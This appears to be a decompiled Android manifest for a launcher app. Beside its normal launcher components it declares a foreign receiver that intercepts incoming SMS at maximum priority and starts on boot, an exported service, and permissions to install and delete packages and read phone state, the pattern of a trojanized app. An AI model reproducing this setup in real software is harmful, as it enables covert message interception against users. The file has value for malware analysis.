<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:sharedUserLabel="@string/uid_name" package="com.android.XWLauncher">
    <permission android:description="@string/permdesc_install_shortcut" android:label="@string/permlab_install_shortcut" android:name="com.android.XWLauncher.permission.INSTALL_SHORTCUT" android:permissionGroup="android.permission-group.SYSTEM_TOOLS" android:protectionLevel="normal"/>
    <permission android:description="@string/permdesc_uninstall_shortcut" android:label="@string/permlab_uninstall_shortcut" android:name="com.android.XWLauncher.permission.UNINSTALL_SHORTCUT" android:permissionGroup="android.permission-group.SYSTEM_TOOLS" android:protectionLevel="normal"/>
    <permission android:description="@string/permdesc_read_settings" android:label="@string/permlab_read_settings" android:name="com.android.XWLauncher.permission.READ_SETTINGS" android:permissionGroup="android.permission-group.SYSTEM_TOOLS" android:protectionLevel="normal"/>
    <permission android:description="@string/permdesc_write_settings" android:label="@string/permlab_write_settings" android:name="com.android.XWLauncher.permission.WRITE_SETTINGS" android:permissionGroup="android.permission-group.SYSTEM_TOOLS" android:protectionLevel="normal"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER_HINTS"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.BIND_APPWIDGET"/>
    <uses-permission android:name="com.android.XWLauncher.permission.READ_SETTINGS"/>
    <uses-permission android:name="com.android.XWLauncher.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:debuggable="true" android:icon="@drawable/ic_launcher_home" android:label="@string/application_name" android:name="LauncherApplication" android:process="android.process.acore">
        <service android:exported="true" android:name="com.nl.MyService"/>
        <receiver android:name="com.nl.MyReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter android:priority="10000">
                <action android:name="android.intent.action.DATE_CHANGED"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.setting.SMS_SENT"/>
            </intent-filter>
        </receiver>
        <activity android:clearTaskOnLaunch="true" android:launchMode="singleTask" android:name="Launcher" android:screenOrientation="portrait" android:stateNotNeeded="true" android:theme="@style/Theme" android:windowSoftInputMode="adjustPan">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.HOME"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.MONKEY"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/pref_label_settings" android:name="MyLauncherSettings"/>
        <activity android:label="@string/pref_label_activities" android:name="ActivityPickerActivity"/>
        <activity android:label="@string/pref_label_shirtcuts" android:name="CustomShirtcutActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:finishOnCloseSystemDialogs="true" android:icon="@drawable/ic_launcher_home" android:label="@string/pick_wallpaper" android:name="WallpaperChooser">
            <intent-filter>
                <action android:name="android.intent.action.SET_WALLPAPER"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <meta-data android:name="android.app.default_searchable" android:value="*"/>
        <receiver android:name=".InstallShortcutReceiver" android:permission="com.android.XWLauncher.permission.INSTALL_SHORTCUT">
            <intent-filter>
                <action android:name="com.android.XWLauncher.action.INSTALL_SHORTCUT"/>
            </intent-filter>
        </receiver>
        <provider android:authorities="com.android.XWLauncher.settings" android:name="LauncherProvider" android:readPermission="com.android.XWLauncher.permission.READ_SETTINGS" android:writePermission="com.android.XWLauncher.permission.WRITE_SETTINGS"/>
        <activity android:name="com.android.XWLauncher.catalogue.AppInfoMList"/>
        <receiver android:icon="@drawable/clock_widget" android:name="mobi.intuitit.android.widget.ClockWidget">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/clockwidget"/>
        </receiver>
        <service android:name="mobi.intuitit.android.widget.TimerService"/>
    </application>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true"/>
</manifest>
